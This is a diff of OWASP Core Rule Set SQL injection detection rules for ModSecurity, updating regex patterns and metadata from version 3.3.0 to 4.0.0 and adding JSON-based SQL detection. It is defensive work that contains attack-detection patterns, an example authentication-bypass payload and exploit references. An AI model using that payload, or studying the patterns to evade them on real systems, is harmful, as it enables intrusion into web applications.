REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)1\.e[\(-\),]" \ + "id:942560,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:replaceComments,\ + msg:'MySQL Scientific Notation payload detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# This rule tries to match JSON SQL syntax that could be used as a bypass technique. +# Referring to this research: https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf # -# This rule is also triggered by the following exploit(s): -# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# Regular expression generated from regex-assembly/942550.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942550 # -SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \ - "id:942110,\ +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\"'`][\[\{].*[\]\}][\"'`].*(::.*jsonb?)?.*(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)|(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)[\"'`][\[\{].*[\]\}][\"'`]|json_extract.*\(.*\)" \ + "id:942550,\ phase:2,\ block,\ - capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,\ - msg:'SQL Injection Attack: Common Injection Testing Detected',\ + t:none,t:urlDecodeUni,t:lowercase,t:removeWhitespace,\ + msg:'JSON-Based SQL Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -511,11 +617,18 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'WARNING',\ - setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# # @@ -524,15 +637,12 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \ # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942120.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942120.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942120.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942120 # -SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\)|\b(?:r(?:egexp|like)|isnull|xor)\b|<(?:>(?:\s+binary)?|=>?|<)|r(?:egexp|like)\s+binary|not\s+between\s+0\s+and|(?:like|is)\s+null|>[=>]|\|\||!=|&&))" \ +SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=->]|<(?:<|=>?|>(?:[\s\v]+binary)?)|\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\s\v]*\()|r(?:egexp|like)[\s\v]+binary|not[\s\v]+between[\s\v]+(?:0[\s\v]+and|(?:'[^']*'|\"[^\"]*\")[\s\v]+and[\s\v]+(?:'[^']*'|\"[^\"]*\"))|is[\s\v]+null|like[\s\v]+(?:null|[0-9A-Z_a-z]+[\s\v]+escape\b)|(?:^|[^0-9A-Z_a-z])in[\s\v\+]*\([\s\v\"0-9]+[^\(-\)]*\)|[!<->]{1,2}[\s\v]*all\b" \ "id:942120,\ phase:2,\ block,\ @@ -548,33 +658,39 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\)|\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ SQL Tautologies ]=- # -# Regexp generated from util/regexp-assemble/regexp-942130.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942130.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Boolean-based SQL injection or tautology attack. Boolean values (True or False) are used to carry out +# this type of SQL injection. The malicious SQL query forces the web application to return a different result de- +# pending on whether the query returns a TRUE or FALSE result. +# +# The original 942130 was split in two rules: +# - 942130 targets tautologies using equalities (e.g. 1 = 1) +# - 942131 targets tautologies using inequalities (e.g. 1 != 2) # -# Not supported by re2 (backreferences, lookaheads). +# We use captures to check for (in)equality in the regexp. So TX.1 will capture the left hand side (LHS) of the inequality, +# and TX.2 will capture the right hand side (RHS) of the logical query. # -SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?:<(?:=(?:[\s'\"`()]*?(?!\b\1\b)[\d\w]+|>[\s'\"`()]*?(?:\b\1\b))|>?[\s'\"`()]*?(?!\b\1\b)[\d\w]+)|(?:not\s+(?:regexp|like)|is\s+not|>=?|!=|\^)[\s'\"`()]*?(?!\b\1\b)[\d\w]+|(?:(?:sounds\s+)?like|r(?:egexp|like)|=)[\s'\"`()]*?(?:\b\1\b)))" \ +# Regular expression generated from regex-assembly/942130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942130 +# +SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\v\"'-\)`]*?(?:=|<=>|(?:sounds[\s\v]+)?like|glob|r(?:like|egexp))[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b" \ "id:942130,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:replaceComments,\ - msg:'SQL Injection Attack: SQL Tautology Detected',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + msg:'SQL Injection Attack: SQL Boolean-based attack detected',\ + logdata:'Matched Data: %{TX.0} found within %{TX.942130_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -583,12 +699,51 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?: tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - multiMatch,\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.942130_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "@streq %{TX.2}" \ + "t:none,\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" +# Rule Targeting logical inequalities that return TRUE (e.g. 1 != 2) +# +# +# We use captures to check for (in)equality in the regexp. So TX.1 will capture the left hand side (LHS) of the inequality, +# and TX.2 will capture the right hand side (RHS) of the logical query. +# +# Regular expression generated from regex-assembly/942131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942131 +# +SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\v\"'-\)`]*?(?:![<->]|<[=->]?|>=?|\^|is[\s\v]+not|not[\s\v]+(?:like|r(?:like|egexp)))[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b" \ + "id:942131,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:replaceComments,\ + msg:'SQL Injection Attack: SQL Boolean-based attack detected',\ + logdata:'Matched Data: %{TX.0} found within %{TX.942131_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.942131_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "!@streq %{TX.2}" \ + "t:none,\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ SQL Function Names ]=- @@ -596,22 +751,18 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?: # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942150.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942150.data -# Note that after assemble an ignore case flag and a word boundary is added -# in front of the Regexp::Assemble output. -# And a non-word character and an opening bracket is added behind the Regexp::Assemble output: -# (?i)\bASSEMBLE_OUTPUT\W*\( +# Regular expression generated from regex-assembly/942150.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942150 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|llation|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:u(?:b(?:str(?:ing(?:_index)?)?|(?:dat|tim)e)|m)|t(?:d(?:dev_(?:sam|po)p)?|r(?:_to_date|cmp))|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha[12]?|oundex|chema|ig?n|leep|pace|qrt)|i(?:s(?:_(?:ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|(?:free|used)_lock)|null)|n(?:et(?:6_(?:aton|ntoa)|_(?:aton|ntoa))|s(?:ert|tr)|terval)?|f(?:null)?)|d(?:a(?:t(?:e(?:_(?:format|add|sub)|diff)?|abase)|y(?:of(?:month|week|year)|name)?)|e(?:(?:s_(?:de|en)cryp|faul)t|grees|code)|count|ump)|l(?:o(?:ca(?:l(?:timestamp)?|te)|g(?:10|2)?|ad_file|wer)|ast(?:_(?:inser_id|day))?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(?:time(?:stamp)?|date)|p(?:datexml|per)|uid(?:_short)?|case|ser)|t(?:ime(?:_(?:format|to_sec)|stamp(?:diff|add)?|diff)?|o(?:(?:second|day)s|_base64|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(?:name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|a(?:wtohex|dians|nd)|o(?:w_count|und)|ight|trim|pad)|f(?:i(?:eld(?:_in_set)?|nd_in_set)|rom_(?:unixtime|base64|days)|o(?:und_rows|rmat)|loor)|p(?:o(?:w(?:er)?|sition)|eriod_(?:diff|add)|rocedure_analyse|assword|g_sleep|i)|a(?:s(?:cii(?:str)?|in)|es_(?:de|en)crypt|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|b(?:i(?:t_(?:length|count|x?or|and)|n(?:_to_num)?)|enchmark)|e(?:x(?:tract(?:value)?|p(?:ort_set)?)|nc(?:rypt|ode)|lt)|g(?:r(?:oup_conca|eates)t|et_(?:format|lock))|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|o(?:(?:ld_passwo)?rd|ct(?:et_length)?)|we(?:ek(?:ofyear|day)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|h(?:ex(?:toraw)?|our)|qu(?:arter|ote)|year(?:week)?|xmltype)\W*\(" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:json(?:_[0-9A-Z_a-z]+)?|a(?:bs|(?:cos|sin)h?|tan[2h]?|vg)|c(?:eil(?:ing)?|h(?:a(?:nges|r(?:set)?)|r)|o(?:alesce|sh?|unt)|ast)|d(?:e(?:grees|fault)|a(?:te|y))|exp|f(?:loor(?:avg)?|ormat|ield)|g(?:lob|roup_concat)|h(?:ex|our)|i(?:f(?:null)?|if|n(?:str)?)|l(?:ast(?:_insert_rowid)?|ength|ike(?:l(?:ihood|y))?|n|o(?:ad_extension|g(?:10|2)?|wer(?:pi)?|cal)|trim)|m(?:ax|in(?:ute)?|o(?:d|nth))|n(?:ullif|ow)|p(?:i|ow(?:er)?|rintf|assword)|quote|r(?:a(?:dians|ndom(?:blob)?)|e(?:p(?:lace|eat)|verse)|ound|trim|ight)|s(?:i(?:gn|nh?)|oundex|q(?:lite_(?:compileoption_(?:get|used)|offset|source_id|version)|rt)|u(?:bstr(?:ing)?|m)|econd|leep)|t(?:anh?|otal(?:_changes)?|r(?:im|unc)|ypeof|ime)|u(?:n(?:icode|likely)|(?:pp|s)er)|zeroblob|bin|v(?:alues|ersion)|week|year)[^0-9A-Z_a-z]*\(" \ "id:942150,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:lowercase,\ - msg:'SQL Injection Attack',\ + msg:'SQL Injection Attack: SQL function name detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -621,21 +772,34 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942180.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942180.data -# Note that after assemble an ignore case flag is inserted in the -# first non-capturing group from the Regexp::Assemble output: -# ASSEMBLE_OUTPUT | s/^(?:/(?i:/ # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`](?:\s*?(?:(?:between|x?or|and|div)[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]|like(?:[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]|\W+[\w\"'`(])|[!=|](?:[\d\s!=+-]+.*?[\"'`(].*?|[\d\s!=]+.*?\d+)$|[^\w\s]?=\s*?[\"'`])|(?:\W*?[+=]+\W*?|[<>~]+)[\"'`])|(?:/\*)+[\"'`]+\s?(?:\/\*|--|\{|#)?|\d[\"'`]\s+[\"'`]\s+\d|where\s[\s\w\.,-]+\s=|^admin\s*?[\"'`]|\sis\s*?0\W)" \ +# -=[ SQL Authentication Bypasses ]=- +# +# Authentication bypass occurs when the attacker can log in as another user +# without knowing the user's password. The example bypass could look like this: +# +# x' OR 'x +# +# Because of the quantity of different rules they are split into: +# - 942540 PL1 +# - 942180 PL2 +# - 942260 PL2 +# - 942340 PL2 +# - 942520 PL2 +# - 942521 PL2 +# - 942522 PL2 + +# Regular expression generated from regex-assembly/942180.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942180 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:/\*)+[\"'`]+[\s\v]?(?:--|[#\{]|/\*)?|[\"'`](?:[\s\v]*(?:(?:x?or|and|div|like|between)[\s\v\-0-9A-Z_a-z]+[\(-\)\+-\-<->][\s\v]*[\"'0-9`]|[!=\|](?:[\s\v -!\+\-0-9=]+.*?[\"'-\(`].*?|[\s\v -!0-9=]+.*?[0-9]+)$|(?:like|print)[^0-9A-Z_a-z]+[\"'-\(0-9A-Z_-z]|;)|(?:[<>~]+|[\s\v]*[^\s\v0-9A-Z_a-z]?=[\s\v]*|[^0-9A-Z_a-z]*?[\+=]+[^0-9A-Z_a-z]*?)[\"'`])|[0-9][\"'`][\s\v]+[\"'`][\s\v]+[0-9]|^admin[\s\v]*?[\"'`]|[\s\v\"'-\(`][\s\v]*?glob[^0-9A-Z_a-z]+[\"'-\(0-9A-Z_-z]|[\s\v]is[\s\v]*?0[^0-9A-Z_a-z]|where[\s\v][\s\v,-\.0-9A-Z_a-z]+[\s\v]=" \ "id:942180,\ phase:2,\ block,\ @@ -651,23 +815,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942200.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942200.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942200 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\s*?\(\s*?space\s*?\(|,.*?[)\da-f\"'`][\"'`](?:[\"'`].*?[\"'`]|(?:\r?\n)?\z|[^\"'`]+)|\Wselect.+\W*?from))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i),.*?[\"'\)0-9`-f][\"'`](?:[\"'`].*?[\"'`]|(?:\r?\n)?\z|[^\"'`]+)|[^0-9A-Z_a-z]select.+[^0-9A-Z_a-z]*?from|(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\s\v]*?\([\s\v]*?space[\s\v]*?\(" \ "id:942200,\ phase:2,\ block,\ @@ -683,23 +844,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942210.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942210.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942210.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942210 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]|\d(?:\s*?(?:between|like|x?or|and|div)\s*?\d+\s*?[\-+]|\s+group\s+by.+\()|\/\w+;?\s+(?:between|having|select|like|x?or|and|div)\W|--\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|#\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|;\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|\@.+=\s*?\(\s*?select|[^\w]SET\s*?\@\w+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:&&|\|\||and|between|div|like|n(?:and|ot)|(?:xx?)?or)[\s\v\(]+[0-9A-Z_a-z]+[\s\v\)]*?[!\+=]+[\s\v0-9]*?[\"'-\)=`]|[0-9](?:[\s\v]*?(?:and|between|div|like|x?or)[\s\v]*?[0-9]+[\s\v]*?[\+\-]|[\s\v]+group[\s\v]+by.+\()|/[0-9A-Z_a-z]+;?[\s\v]+(?:and|between|div|having|like|x?or|select)[^0-9A-Z_a-z]|(?:[#;]|--)[\s\v]*?(?:alter|drop|(?:insert|update)[\s\v]*?[0-9A-Z_a-z]{2,})|@.+=[\s\v]*?\([\s\v]*?select|[^0-9A-Z_a-z]SET[\s\v]*?@[0-9A-Z_a-z]+" \ "id:942210,\ phase:2,\ block,\ @@ -715,20 +873,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942260.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble-v2.pl regexp-942260.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# ASSEMBLE_OUTPUT | s/^(?:/(?i:/ +# Regular expression generated from regex-assembly/942260.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942260 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\v]*?(?:(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\|\||&&)[\s\v]+[\s\v0-9A-Z_a-z]+=[\s\v]*?[0-9A-Z_a-z]+[\s\v]*?having[\s\v]+|like[^0-9A-Z_a-z]*?[\"'0-9`])|[0-9A-Z_a-z][\s\v]+like[\s\v]+[\"'`]|like[\s\v]*?[\"'`]%|select[\s\v]+?[\s\v\"'-\),-\.0-9A-\[\]_-z]+from[\s\v]+" \ "id:942260,\ phase:2,\ block,\ @@ -744,20 +899,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942300.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942300.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942300.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942300 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)\s+\s*?\w+\(|\)\s*?when\s*?\d+\s*?then|[\"'`]\s*?(?:--|\{|#)|cha?r\s*?\(\s*?\d|\/\*!\s?\d+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 